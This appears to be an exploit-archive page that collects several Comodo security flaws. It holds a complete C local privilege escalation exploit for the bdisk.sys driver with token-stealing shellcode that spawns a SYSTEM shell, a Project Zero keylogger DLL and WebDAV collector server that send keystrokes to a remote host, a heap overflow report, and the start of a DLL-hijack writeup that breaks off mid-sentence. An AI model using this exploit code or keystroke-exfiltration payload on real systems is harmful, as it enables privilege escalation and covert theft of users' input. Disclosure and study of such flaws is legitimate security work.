Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.comodo.com
Tested Version - 4.4.0.0
Driver Version - 1.0.0.957 - bdisk.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/112828
CVE ID - CVE-2014-9633
Vendor fix url - http://forums.comodo.com/news-announcements-feedback-cb/comodo-backup-44123-released-t107293.0.html
Fixed version - 4.4.1.23
Fixed Driver Ver - 1.0.0.972
Note
----
Does not cleanly exit, had to use some leave instructions to get the command
prompt. If you know of a better way please do let me know.
Below in from Windows XP in IofCallDriver function.
eax = 12h
804e37fe 8b7108 mov esi,dword ptr [ecx+8] <- control the null page as ecx = 00000000
804e3801 52 push edx
804e3802 51 push ecx
804e3803 ff548638 call dword ptr [esi+eax*4+38h] ds:0023:00000080=00000090
804e3807 5e pop esi
804e3808 c3 ret
esi + eax*4 + 38h = 0 + 48 + 38 = 80h if ESI is null
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 4096
typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
IN HANDLE ProcessHandle,
IN OUT PVOID *BaseAddress,
IN ULONG ZeroBits,
IN OUT PULONG RegionSize,
IN ULONG AllocationType,
IN ULONG Protect);
// Windows XP SP3
#define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct
#define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct
#define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct
// Windows 7 SP1
#define W7_KPROCESS 0x50 // Offset to _KPROCESS from a _ETHREAD struct
#define W7_TOKEN 0xf8 // Offset to TOKEN from the _EPROCESS struct
#define W7_UPID 0xb4 // Offset to UniqueProcessId FROM the _EPROCESS struct
#define W7_APLINKS 0xb8 // Offset to ActiveProcessLinks _EPROCESS struct
BYTE token_steal_xp[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN
0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE token_steal_w7[] =
{
0x52, // push edx Save edx on the stack
0x53, // push ebx Save ebx on the stack
0x33,0xc0, // xor eax, eax eax = 0
0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD
0x8b,0x40,W7_KPROCESS, // mov eax, [eax+W7_KPROCESS] Retrieve _KPROCESS
0x8b,0xc8, // mov ecx, eax
0x8b,0x98,W7_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+W7_TOKEN] Retrieves TOKEN
0x8b,0x80,W7_APLINKS,0x00,0x00,0x00, // mov eax, [eax+W7_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks
0x81,0xe8,W7_APLINKS,0x00,0x00,0x00, // sub eax, W7_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks
0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+W7_UPID], 4 | Compares UniqueProcessId with 4 (System Process)
0x75,0xe8, // jne ----
0x8b,0x90,W7_TOKEN,0x00,0x00,0x00, // mov edx, [eax+W7_TOKEN] Retrieves TOKEN and stores on EDX
0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX
0x89,0x90,W7_TOKEN,0x00,0x00,0x00, // mov [eax+W7_TOKEN], edx Overwrites the TOKEN for the current KPROCESS
0x5b, // pop ebx Restores ebx
0x5a, // pop edx Restores edx
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc9, // leave
0xc3 // ret
};
BYTE ESInull[] = "\x00\x00\x00\x00";
BYTE RETaddr[] = "\x90\x00\x00\x00";
int GetWindowsVersion()
{
int v = 0;
DWORD version = 0, minVersion = 0, majVersion = 0;
version = GetVersion();
minVersion = (DWORD)(HIBYTE(LOWORD(version)));
majVersion = (DWORD)(LOBYTE(LOWORD(version)));
if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP;
if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7";
return v;
}
void spawnShell()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&pi, sizeof(pi));
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.cb = sizeof(si);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOWNORMAL;
if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
return;
}
CloseHandle(pi.hThread);
CloseHandle(pi.hProcess);
}
int main(int argc, char *argv[])
{
_NtAllocateVirtualMemory NtAllocateVirtualMemory;
NTSTATUS allocstatus;
LPVOID base_addr = (LPVOID)0x00000001;
DWORD written;
int rwresult;
int size = BUFSIZE;
HANDLE hDevice;
unsigned char buffer[BUFSIZE];
unsigned char devhandle[MAX_PATH];
printf("-------------------------------------------------------------------------------\n");
printf(" COMODO Backup (bdisk.sys) Null Pointer Dereference EoP Exploit \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "bdisk");
NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
if (!NtAllocateVirtualMemory)
{
printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
return -1;
}
printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
printf("[+] Allocating memory at [0x%p]\n", base_addr);
allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (allocstatus)
{
printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus);
printf("Error : %d\n", GetLastError());
return -1;
}
printf("[+] NtAllocateVirtualMemory successful\n");
memset(buffer, 0x90, BUFSIZE);
memcpy(buffer+0x00000007, ESInull, sizeof(ESInull)-1);
memcpy(buffer+0x0000007f, RETaddr, sizeof(RETaddr)-1);
if (GetWindowsVersion() == 1)
{
printf("[i] Running Windows XP\n");
memcpy(buffer+0x00000100, token_steal_xp, sizeof(token_steal_xp));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));
}
else if (GetWindowsVersion() == 2)
{
printf("[i] Running Windows 7\n");
memcpy(buffer+0x00000100, token_steal_w7, sizeof(token_steal_w7));
printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
}
else if (GetWindowsVersion() == 0)
{
printf("[i] Exploit not supported on this OS\n\n");
return -1;
}
rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
if (rwresult == 0)
{
printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
return -1;
}
printf("[+] WriteProcessMemory %d bytes written\n", written);
printf("[~] Press any key to Exploit . . .\n");
getch();
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if (hDevice == INVALID_HANDLE_VALUE)
{
printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
return -1;
}
else
{
printf("[+] Open %s device successful\n", devhandle);
}
CloseHandle(hDevice);
printf("[+] Spawning SYSTEM Shell\n");
spawnShell();
return 0;
}
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=737
Lzx_Decoder::init() initializes the vector Lzx_Decoder->window to a fixed size of 2^method bytes, which is then used during Lzx_Decoder::Extract(). It's possible for LZX compressed streams to exceed this size. Writes to the window buffer are bounds checked, but only after the write is completed.
The code is probably something like:
window[++window_pos] = foo;
if (window_pos > window.size())
return false;
This means the overflow still occurs, resulting in memory corruption, and can be corrupted multiple times per stream as a single scan can contain multiple LZX compressed blobs. Scanning the attached testcase with page heap enabled results in the following error:
(918.644): Unknown exception - code 000006ba (first chance)
===========================================================
VERIFIER STOP 000000000000000F: pid 0x918: corrupted suffix pattern
0000000040C71000 : Heap handle
0000000040F76FE0 : Heap block
0000000000010018 : Block size
0000000040F86FF8 : corruption address
===========================================================
> lmv munarch
start end module name
000007fe`f44c0000 000007fe`f4562000 unarch (export symbols) C:\Program Files\COMODO\COMODO Internet Security\scanners\unarch.cav
Loaded symbol image file: C:\Program Files\COMODO\COMODO Internet Security\scanners\unarch.cav
Image path: C:\Program Files\COMODO\COMODO Internet Security\scanners\unarch.cav
Image name: unarch.cav
Timestamp: Mon Dec 29 04:52:14 2014 (54A14E7E)
CheckSum: 000AC529
ImageSize: 000A2000
File version: 6.2.15068.1057
Product version: 6.2.15068.1057
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04e4
CompanyName: COMODO
ProductName: COMODO Antivirus Scan Engine
ProductVersion: 6, 2, 342748, 1057
FileVersion: 6, 2, 342748, 1057
FileDescription: COMODO Antivirus Scan Engine
LegalCopyright: 2005-2014 COMODO. All rights reserved.
Please note that many of the CAV modules used by Comodo do not use dynamic base, so ASLR does not work. Naturally, all files are scanned with NT AUTHORITY\SYSTEM and with no sandboxing.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39606.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=769
Comodo Antivirus includes a x86 emulator that is used to unpack and monitor obfuscated executables, this is common practice among antivirus products. The idea is that emulators can run the code safely for a short time, giving the sample enough time to unpack itself or do something that can be profiled. Needless to say, this is a very significant and complicated attack surface, as an attacker can trigger emulation simply by sending the victim an email or getting them to visit a website with zero user interaction.
I've found some memory corruption issues with the emulator, but Comodo also implement hundreds of shims for Win32 API calls, so that things like CreateFile, LoadLibrary, and so on appear to work to the emulated code. Astonishingly, some of these shims simply extract the parameters from the emulated address space and pass them directly to the real API, while running as NT AUTHORITY\SYSTEM. The results are then poked back in to the emulator, and the code continues.
The possible attacks here are too numerous to mention.
Here are some of the more obvious mistakes, let's start with USER32!GetKeyState (wtf!!!!). Here is the emulator shim from mach32.dll:
.text:1001D9A0 sub_1001D9A0 proc near ; DATA XREF: .data:1016B10C31o
.text:1001D9A0
.text:1001D9A0 arg_0 = dword ptr 8
.text:1001D9A0
.text:1001D9A0 55 push ebp
.text:1001D9A1 8B EC mov ebp, esp
.text:1001D9A3 8B 45 08 mov eax, [ebp+arg_0] ; pVMClass
.text:1001D9A6 8B 08 mov ecx, [eax] ; vtbl
.text:1001D9A8 8B 91 98 00 00+ mov edx, [ecx+98h] ; VArg2Rarg
.text:1001D9AE 6A 00 push 0
.text:1001D9B0 6A 06 push 6 ; TypeDword
.text:1001D9B2 6A 01 push 1 ; ParamNum
.text:1001D9B4 50 push eax ; this
.text:1001D9B5 FF D2 call edx ; VArg2Rarg(pVMClass, 1, TypeDword, 0); Virtual Arg to Real Arg
.text:1001D9B7 50 push eax ; nVirtKey
.text:1001D9B8 FF 15 F4 62 07+ call ds:GetKeyState ; Extract parameter from emulator, then return the real value (!!!)
.text:1001D9BE 98 cwde
.text:1001D9BF 5D pop ebp
.text:1001D9C0 C3 retn
.text:1001D9C0 sub_1001D9A0 endp
The emulated code can query the real keyboard state (!!!).
I've found that the simplest method of triggering the emulation is to create a DLL with a writable text section. An attacker would also need a way to exfiltrate the monitored keystrokes out of the emulator, but I've found that the shim for kernel32!SetCurrentDirectoryA actually calls GetFileAttributes() on the specified parameter, so you can encode it as a UNC path and send it over the network to your control server. This doesn't require any user interaction.
To reproduce this bug, first, create a DLL like this:
#include <windows.h>
#include <stdio.h>
#pragma comment(lib, "KERNEL32")
#pragma comment(lib, "USER32")
// This is required to trigger the generic unpacker in comodo.
#pragma comment(linker, "/SECTION:.text,ERW")
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
char path[128];
char *ptr;
ZeroMemory(path, sizeof path);
ptr = strcpy(path, "\\\\?\\UNC\\192.168.237.1\\");
ptr += strlen(ptr);
SetCurrentDirectory(path);
for (;;) {
for (*ptr = 'A'; *ptr <= 'Z'; (*ptr)++) {
if (GetKeyState(*ptr) & 0x8000) {
SetCurrentDirectory(path);
}
}
}
return TRUE;
}
Then run a minimal WebDAV server like this on the remote host:
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
class WebDavHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_OPTIONS(self):
self.send_response(200)
self.send_header('Allow', 'OPTIONS, GET, PROPFIND')
self.send_header('DAV', '1, 2')
self.end_headers()
self.connection.shutdown(1)
def do_PROPFIND(self):
self.send_response(207)
self.send_header('Content-type', 'text/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0"?><a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:"><a:response></a:response></a:multistatus>')
self.connection.shutdown(1)
SocketServer.TCPServer(('0.0.0.0', 80), WebDavHandler).serve_forever()
You only get a few seconds of logging per scan, but you can duplicate the payload thousands of times into a ZIP archive for effectively unlimited scan time. Something like this:
$ for ((i=0;i<1024;i++)); do cp keystroke.dll $i.dll; zip keystroke.zip $i.dll; rm -f $i.dll; done
Now scanning that zip file will send all keystrokes to the WebDAV server for approximately ten or so minutes (please note, there's no reason this can't be extended indefinitely), see screenshot for reference.
This is not the only attack possible, you can also extract, delete, query and use cryptographic keys, smartcards and other security hardware, because calls to CAPI routines like are all passed directly through to the real API:
ADVAPI32!CryptAcquireContextA
ADVAPI32!CryptDecrypt
ADVAPI32!CryptDeriveKey
ADVAPI32!CryptCreateHash .. and so on.
Any secrets stored in the registry are also exposed to attackers via RegQueryValueEx and GetProfileInt among others, all passed directly through to the real API. The list of possible attacks here is simply too long to enumerate, any competent developer can see this is a colossal mistake that needs to be remedied urgently.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39599.zip
<#
````......````
``,;''''''''''''''''';,`
.;''''''''''''''''''''''''''',`
`:''''''''+';:,.``````.,:;'''''''''':`
,;'''''';,.` ``,;'''''';:
`:'''''',. `,'''''';.
`;+''+':` ,; `,''''';.
`;'''';. `` .:;'` `. `;'''''.
` :+''';` `,``:+'' ';;'`,''; `` `` :'''';`
.'''';` ,';' '':'` ';,'`'',' :''' .''` :'''',
`;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''`
.''''. ;:`, .'.':`'''.:;`;. +;:' '::; ;''' '; .'''',
:''';` ` '''',`':'' ..;:`','` '''' ':;;`'`';`':` :; :''';
;''+, .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';': .+'''`
`''''` ;'; ''.'.,','` ,` ``;`'' .`;'`''+: ;'''`
`'''' ., .'' ,'.'' ;;. ```````` `. ``'::'`;; ` :'''.
``''': `+,` .':`'',' `,;''''''''''+'':.` ;'.+:;'``': .'''.
`''', '', ''`:; `:'''''''''''''''''''''';. `;'`': ''`'` .''',
`''', ` `''` `'; .''''''''''''''''''''''''''''';` `.;' ;'.''`.: `''',
`''', :''.`'' ` ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''` .'''.
''', '.''`,': ,'''''''''''''''''''''''''''''''''''''', ` .+,'; ''; .'''`
''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''. ;' :': ,,` .'''
:''; `''.'` ` :''''''''''''';:::.', `''';`:;'+'''','''''+; `,'; :''' ,'''
.''' `` .++; `''''''''''''`. `': '''; `:''' :'''''''. .+ :''.+. :'':
`''+ :'': `` ,''''''''''''' `': '''; `: ,'''''''': .`''.'' ` '''`
;''. `+.',; ;'''':''''''''; ` ', .'''': ` :''''';'''; `'.',`,', `+''
,'': '';,'. ;''''':''''''''`+` ;..`;'+''. '.:''''';'''''```.+' +:'` .'';
`''' `;``+',;.` ;''''':''''''''.'; `;'', '` '' ;''''','''''` ;,+.+. ;''.
;'+. :'': ;': ;'''''':''''':',''. `'';.+' '` ,'; .'''';''''''` `+.':` `'''
`'': .+`;''` ` ;'''''':''''''.::''. .''. :: `'';`,'''':''''''` :+'. ,'',
'''` :''.:'' :''''''':'''''; :'''' .'', `.,; :+'`''': ;''',''''''' ,` '''
.'': `'';`` ,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+` .'':
''' `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''', ` ;'': '''
.'', ','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''` :'';` `+':
'''` ''.,'; ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;''
`'': .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', ., `` .'',
` :'' :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''` .++. '';
+'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.''''''; .+'''` :'+`
,''. ': +'''''; ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.', ;''''''` :'': `. `'';
;'' :;.;': ,''''''. `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.; .;'+` ;''
'': ` ;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;. ,'''''' `;''''. .''`
.''. .';`;' .''''''. :+;;''''''''''': ;' ::::...;''+'':,'''';..``;''';. ''''''; `:''.`': `'':
:'' ` ,'` ;''''''. :;'''''''''''''';`;, `,''';` .:;;;'''': ,'''''' .,''', '''
;'; ''';,` `''''''''''` :''''''''''';.:'''`';:` ,''';`;''''''''''', ''''''. ;';,` :''`
`'', .;,'''; ,'''''''''' ;'''''''''':` :'''`::` ``'''',+''''''''''''+` ;'''''; .``.:;` `''.
.''` `+;'`;` '''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''` ;'';;; `+':
:'' ..;'' `''''''''''`'''''''', .'''` `+''';''. ,'''''''''''''''''''''''''''''''''''''':`
;'' :. `` .'''''''''';'''''''' ;''; ;''':::` :'''''''''''''''''''''''''''''''''''''''',
;': '''':` :'''''''''''''''''',` .''' ''''. `+'''''''''''''''''''''''''''''''''''''''''
'', :,;'': ;''''''''''''''''''` ;''... :''''` :''''''''''''''''''''''''''''''''''''''''''`
`''. `+'':,` ''''''''''''''''''; ,'';.+` . ,;''' `'''''''''''''''''''''''''''''''''''''''''';
.''. `.,;'; '''''''''';''''''', ''',+. `` .' .''' ''''''''+'''''''''''''''''''''''''''''''''',
.'+` ;''''' `` '''''''` `;''''.'++','`+.''' ''''''; `;+''''''
,'' ''''';; ,'''';'''';'``.''' :''''''` .'''''':
:'+ '''''': .'''';'''';'` .''' ,''''''` ,''''';
:'' ,''''', ''''''` .'''';'''';', .'''` .''''''` ''''''
;'' `''''''; :''''', '''''' .'''';'''';':,''''. .''''''` ''''''
;'' `';''''' :''''', :''''; :''''''''';''.''''' `''''''` ;'''''
;'' :''''', ,''''' `+''''''''':''.'''''` ,'''''; ''''''
:'+ ,''''', `'''''. ,'''''''''':''::''''; ;''''': `''''''
:'' ```. ,''''': ''''': `''''''''''',''+`'''''. `''''''. :''''''
,''` `''''''' .'''''; `''''': '''''''''''';''',,''''', ''''''' ,'''''',
.''` `''':,.; `'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .''''''''
`''` `,;;;''` '''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''',
'', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+ '''''''''''''''''''''''''''''';
'': ` `,. ;'''''. `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';';
;'; ,''''; :''''': `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,'''''''''''''''''''''''''''';
;'' ';;,.. .'''''' `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';.
:'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+: '''''''';''''''''';''''';,`
.''. .''',` ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''` `'''''' `,'': `+':
'': ` .;. ,'''''+ .'';,'''''''';:''''''''','''''''': ;'''''''''.`,''''''' ;'''''; ,'', .''.
''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''', ''''''. ':''', :''`
:'' ,';:.'. ;'''''' ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'': :'''''' ';,.:' '''
.''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'':
''; ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;: ,''`
;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.''''''; ,'+'. '''
.''. '''';` ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:''' `'':
''' :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..' :''
:''` `,. ;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''` '';
`'': `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,' ,'',
;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+; '''
`'': ;'';` ` ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:'; .'':
''+` ,` ,+: `'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;, '''
.'': ;';''. .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''': +'``;'; .'',
''+` :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';''''''; ,.''. .`` '''
`';; `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''.
:'',` `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''` `'''
''' ;'.:''` ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',: '''`
.';; `;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';'''''; .,''` :` ,'':
;'', `', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,''''; ``.'''; ``'''
'''` `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''` '''`
.''' ;'.'' `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'',
,''; ''.;', ,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';
;''; ''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''
''': .,,': :': +''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',`
''': ` .'' `'`;'''''''..,.:+,` ``.,.` ,'''`;'''''''+.';'.:'''':;'''''+:.'`
''': ;:`+'` ,:..,''''''; .+: `:'+''''';` ;'; .''''': `:';:+''';`''''''. .':
`'''; ; ;'. .';'`;'''',;'. .+''''''''''` ;;'+:'''; .+'''''''';''''''.;,'';
`'''' ,'; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.''';
`'''' ` ` `':. ';''.+. `''''''''''''; `'''''::'''.'''',`'''''': :';;''
''''. :;,'`:'.';', '''''''''''': ,'''','''..''': '''';;:,''. `''
:''': `.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' ';
,''''` `,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`':
`'''': ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','.
:''''. .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'.
`'''''` `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''',''
,'''''` `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:
:''''', .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.
`:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+
`,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:
.;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +
.:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``:
'. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`'
;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`;
.+ ''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;`
+: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;..,
,' ``.. `+''''''''''+` :' `'';`''':. ,.',''.; '
`+' :'''''''''''', `+.` '',.''',. :,''''+ ;
.', ;''''''''''''. ': ''.,''':` ;.''''.,.
:'. :''''''''''', ;'` ''.:''',':;.''':.:
''. ,:''''',` ;+` :'.:'''' ':`''; ;
`'', ''. ::,''''``; :, '
;+;` .'+` ``'':'`,; '``
,'';. `.'';` :';'.,; '.
`,''';:::::;'''. ``+;' +`
`,:''''';,` ,,;
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
###Technical Geeky Stuff###
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
The directory listing is as follows:
10/06/2015 12:08 AM <DIR> .
10/06/2015 12:08 AM <DIR> ..
10/02/2015 10:43 PM 27 download.cfg
10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015 10:43 PM 1 survey_version.txt
10/06/2015 12:05 AM <DIR> updates
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows
non-administrator users the ability to create files in the directory but not delete or modify
existing files.
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
